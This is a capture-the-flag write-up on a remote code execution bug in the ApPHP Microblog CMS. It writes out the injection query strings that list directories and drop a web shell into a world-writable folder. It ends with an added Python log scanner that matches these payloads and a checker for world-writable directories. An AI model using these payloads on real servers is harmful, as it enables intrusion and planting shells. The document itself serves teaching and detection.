Posted on by and filed under D-CTF 2014.

For this challenge, we were presented with a website made from the ApPHP Microblog CMS. A quick search on Exploit-DB revealed that there was an existing RCE bug.
PHP's disable_functions list was extensive: exec, shell_exec, and system were all disabled, which left only a few useful functions. It was also discovered that character escaping was applied to the usual suspects, so the strings we wanted could not be passed directly as literals. That left request-controlled variables as the way in: $_COOKIE and $_POST could each supply a string to functions like scandir() and file_get_contents(), with implode() turning the superglobal array into a single string.
GET index.php HTTP/1.1

GET Request: ?asdf);print_r(scandir(implode($_COOKIE))=/
Cookie: 0=include

After investigating the [include] directory, we found that it was world writable, which allowed a shell such as r57 or similar to be dropped there.

Request: ;file_put_contents(implode($_POST),file_get_contents(implode($_COOKIE))=/
Post Request: 0=include/myfile.php
Cookie: 0=
This placed a shell on the server that we could access. From there, we traversed to the root of the filesystem (/), found the [./flag] executable, and ran it from the planted shell to get the flag to turn in.
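From a defender's side, the two weaknesses this write-up chains together are detectable and auditable. The following Python script is an added example and is not part of the original write-up or of the ApPHP Microblog CMS: it (1) scans access-log lines for query strings that carry PHP function calls fed from request superglobals (the scandir/implode($_COOKIE) and file_put_contents/file_get_contents patterns shown above, URL-encoded or not) and (2) audits a web root for world-writable directories such as the [include] directory abused here. The log lines and the throwaway web root are constructed for the example; the function names (suspicious_calls, flag_log, world_writable_dirs, demo_webroot) are my own.

```python
"""Defensive checks for the two weaknesses described in the write-up.

Added example, not code from the original post: flag request lines whose
query string contains PHP calls driven by request superglobals, and audit a
web root for world-writable directories. All sample data is constructed.
"""
from __future__ import annotations

import os
import re
import stat
import tempfile
from urllib.parse import unquote_plus

# Constructed access-log lines (Apache combined style, abbreviated).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Oct/2014:13:01:02 +0000] "GET /index.php?id=3 HTTP/1.1" 200 512
10.0.0.9 - - [12/Oct/2014:13:01:10 +0000] "GET /index.php?asdf);print_r(scandir(implode($_COOKIE))=/ HTTP/1.1" 200 2048
10.0.0.9 - - [12/Oct/2014:13:02:44 +0000] "GET /index.php?asdf);file_put_contents(implode($_POST),file_get_contents(implode($_COOKIE))=/ HTTP/1.1" 200 13
10.0.0.9 - - [12/Oct/2014:13:03:00 +0000] "GET /index.php?asdf%29%3Bprint_r%28scandir%28implode%28%24_COOKIE%29%29=/ HTTP/1.1" 200 2048
10.0.0.7 - - [12/Oct/2014:13:04:00 +0000] "GET /index.php?page=include HTTP/1.1" 200 80
"""

# Pull method and request target out of the quoted request field.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# PHP calls that have no business appearing inside a query string of this CMS.
SENSITIVE_CALLS = ("scandir", "file_get_contents", "file_put_contents",
                   "print_r", "implode", "include", "eval")
# Request superglobals used in the write-up as a side channel for strings.
SUPERGLOBAL_RE = re.compile(r"\$_(COOKIE|POST|GET|REQUEST)\b")


def suspicious_calls(query: str) -> list[str]:
    """Return the sensitive PHP call names found in a query string.

    The query is URL-decoded first so percent-encoded payloads are caught.
    A bare word such as 'include' is only flagged when followed by '('.
    """
    decoded = unquote_plus(query)
    found = [name for name in SENSITIVE_CALLS
             if re.search(r"\b" + name + r"\s*\(", decoded)]
    if SUPERGLOBAL_RE.search(decoded):
        found.append("superglobal")
    return found


def flag_log(log_text: str) -> list[tuple[str, list[str]]]:
    """Return (client_ip, findings) for every request carrying PHP in its query."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = m.group("target").partition("?")[2]
        findings = suspicious_calls(query)
        if findings:
            hits.append((line.split(" ", 1)[0], findings))
    return hits


def world_writable_dirs(root: str) -> list[str]:
    """Return directories under root (as relative paths) that are world-writable."""
    bad = []
    for dirpath, dirnames, _ in os.walk(root):
        for d in dirnames:
            full = os.path.join(dirpath, d)
            if os.lstat(full).st_mode & stat.S_IWOTH:
                bad.append(os.path.relpath(full, root))
    return sorted(bad)


def demo_webroot() -> list[str]:
    """Build a throwaway web root with a world-writable include/ dir and audit it."""
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, "include"))
    os.chmod(os.path.join(root, "include"), 0o777)  # the misconfiguration
    os.mkdir(os.path.join(root, "css"))
    os.chmod(os.path.join(root, "css"), 0o755)      # a correctly permissioned dir
    return world_writable_dirs(root)


if __name__ == "__main__":
    for ip, findings in flag_log(SAMPLE_LOG):
        print(f"{ip}: {', '.join(findings)}")
    print("world-writable directories:", demo_webroot())
```

The log check deliberately decodes before matching, since the same payload arrives URL-encoded in the fourth sample line, and it requires an opening parenthesis after the name so that an ordinary parameter value like page=include is not flagged. Run against a real web root, world_writable_dirs() is the quick way to find the kind of directory that turned this bug from a file read into a planted shell.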